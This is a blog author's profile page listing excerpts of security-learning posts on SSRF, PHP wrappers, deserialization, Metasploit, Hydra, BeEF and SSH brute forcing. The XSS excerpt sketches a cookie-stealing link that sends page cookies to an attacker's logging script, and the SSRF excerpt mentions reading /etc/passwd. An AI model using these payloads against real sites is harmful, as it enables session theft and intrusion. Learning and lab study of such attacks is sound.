自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 收藏
  • 关注

原创 全新kali搭建pwn环境(超详细截图)

可能会用到的命令:删除目录rm -rf 目录名下面所有安装操作最好都在root用户同一目录(~)下cd ~安装报这个错误是自己网络问题,我连的校园网后来换热点就好了。kali源和pip源不一样两个都最好换源,不换可能会报错,换了下载速度也快。

2024-05-24 18:40:24 757

原创 SSRF其它绕过和攻击利用

构造数据 gopher提交数据:

2024-04-11 17:51:56 898

原创 php://filter过滤器学习

一、字符串过滤器一、字符串过滤器以string开头对数据进行字符串对于的处理常见的有rot13touppertolower等。rot13(回转13)原理上来说是对26个小写字母以及26个大写字母进行操作,对原有字母的ASCII值 + 13或者ASCII-13,然后找到计算后的ASCII值对应的字母。通过这样的规则将一个字母替换为另一个字母,从而达到加密的目的。strip_tags是对数据流进行strip_tags函数的处理,该函数功能为剥去字符串中的HTMLXML以及PHP的标签,简单理解就是。

2024-04-11 10:22:15 829

原创 SSRF漏洞伪协议学习

在有SSRF漏洞的服务器或主机提供的网页中使用一些伪协议来获取内网信息。这里可能需要ssrf漏洞靶场来做实验。

2024-04-07 22:06:09 1012

原创 SSRF漏洞简单学习

SSRF(服务器请求伪造)是一种由攻击者形成服务器端发起的安全漏洞,本质属于信息泄露漏洞。file://从文件系统中获取文件内容,如file:///etc/passwd。当我们发现有ssrf漏洞服务器或主机后可以利用一些伪协议访问内网的主机。形成的原因:大部分是由于服务器端提供了从其他服务器应用。sftp:// SSH文件传输协议或安全文件传输协议。gopher://分布式文档传递服务。攻击的目标是:在外网内无法访问的。ldap://轻量级目录访问协议。tftp://简单文件传输协议。

2024-04-06 20:54:52 110 1

原创 PHP伪协议学习

主要学习file://、php://input、php://filter、data://、zip://, bzip2://, zlib://几个伪协议。要成功应用伪协议需要php.ini文件的allow_url_fopen默认开启 (on)allow_url_include默认关闭(off)

2024-04-06 15:27:46 568 1

原创 反序列化简单绕过

1.当序列化字符串不包含原先属性且语法正确的情况下,反序列化会输出类中原有的其他属性。

2024-04-04 14:04:33 735 1

原创 PHP魔术方法

在对象生命周期结束之前执行一些必要的清理操作,如释放资源、关闭数据库连接、保存对象状态等。自定义对象在被调试时的输出,可以控制对象在使用 var_dump() 函数时打印的信息。在对象创建之后对其进行初始化操作,如初始化属性、建立与数据库的连接、加载必要的资源等。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。在对象被克隆时提供一个修改克隆副本的机会。一个对象的不存在或不可访问的。

2024-03-31 15:19:41 730

原创 PHP序列化和反序列化

序列化序列化序列化是指将数据结构或对象转换为一串字节流的过程。使其可以在存储、传输或缓存时进行持久化。反序列化反序列化是指将序列化后的数据进行解码和还原,恢复为原始的数据结构或对象的过程。反序列化是序列化的逆过程。在 PHP 中,使用函数可以将数据结构或对象进行序列化,得到一个表示序列化后数据的字符串。通过函数可以将这个字符串进行反序列化,将其还原为原始的数据。序列化格式O:长度:“类名”:变量数:{变量类型:变量名长度:“变量名字”;变量的值;

2024-03-31 09:52:36 714

原创 MSF利用

漏洞检测程序,只检测漏洞是否存在:漏洞利用程序,真正发起攻击的行为,kali中集成了很多EXP,代码文件目录:/usr/share/metasploit-framework/modules/exploits:攻击主机主动去连接被攻击主机,比如我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,防火墙对进入主机某些端口的数据限制是很严的,一般防火墙都是进口的数据限制严格,出口的数据限制相对没有那么严格。

2024-03-24 23:03:21 928

原创 Hydra破解

用户名字典和密码字典需要自己准备,字典越强大破解成功几率越大。

2024-03-24 16:01:43 253

原创 beef-xss

使用:打开管理界面后将放到有xss漏洞的地方,在管理界面可以控制对方浏览器。为同一局域网内本机IP,不同网段可为服务器IP,当然相关操作也要在服务器上进行。首次启动要输入设置密码,此密码为管理界面的密码。kali工具在root用户下先更新避免安装失败。

2024-03-23 16:25:02 140

原创 XSS攻击

准备工作可以写一个PHP文件(getcookie.php)把传来的cookie写入到一个文件中。写一个恶意链接:document.location="http://"/xss/getcookie.php?跳转到攻击者服务器地址访问xss目录下的getcookie.php文件并传入参数为当前页面的cookie值。把恶意链接写入到有xss漏洞的网站中。

2024-03-23 15:32:06 209

原创 SSH模拟爆破

SSH协议(Secure Shell,安全外壳协议)是一种需要进行加密和认证的,用于远程访问及文件传输的网络安全协议(加密的网络传输协议)。SSH功能类似于Telnet服务,但SSH基于加密和认证的特性可以为用户提供更强大的安全保障机制,在用户使用不安全的网络环境登录设备时,SSH能够有效保护设备不受IP地址欺诈、明文密码截取等攻击。

2024-03-23 14:43:28 204

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除